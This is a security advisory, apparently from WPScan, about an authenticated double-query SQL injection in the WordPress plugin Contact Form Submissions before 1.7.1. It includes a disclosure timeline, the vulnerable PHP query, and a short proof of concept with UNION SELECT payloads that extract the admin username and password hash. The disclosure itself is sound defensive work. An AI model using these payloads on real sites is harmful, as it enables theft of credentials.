Contact Form Submissions < 1.7.1 – Authenticated Double Query SQL injection

Description

The plugin is affected by a double query SQL injection, which could allow high privileged users to access data from the DBMS.

Edit (WPScanTeam)
October 26th, 2020 - Confirmed & Escalated to WP
October 27th, 2020 - WP Investigating
January 3rd, 2021 - No updates, disclosing
March 29th, 2021 - v1.7 released to attempt to remediate the issue using sanitize_text_field(), which does not fix the SQL injection
April 7th, 2021 - v1.7.1 released, fixing the issue

Proof of Concept

Pre requirements:
Install Contact form 7
Install Contact Form Submission

Affected File : contact-form-submissions/Admin.php:416
Code:
global $wpdb;
        $post_id = $wpdb->get_var("SELECT post_id FROM $wpdb->postmeta WHERE meta_key = 'form_id' AND meta_value = $form_id LIMIT 1;");
        $columns = $wpdb->get_col("SELECT meta_key FROM $wpdb->postmeta WHERE post_id = $post_id AND meta_key LIKE '%wpcf7s_%' GROUP BY meta_key");


To reproduce:
1 - Authenticate with an admin user.
2 - Access the profile page, change last name field to 0 UNION SELECT concat(user_login,'---',user_pass) FROM wp_users WHERE ID=1--
3 - Open https://localhost/wp-admin/edit.php?post_type=wpcf7s&wpcf7_contact_form=0 UNION SELECT meta_value FROM wp_usermeta WHERE umeta_id=1 and increment the umeta_id parameter until there is the admin username and hashed password output as a column.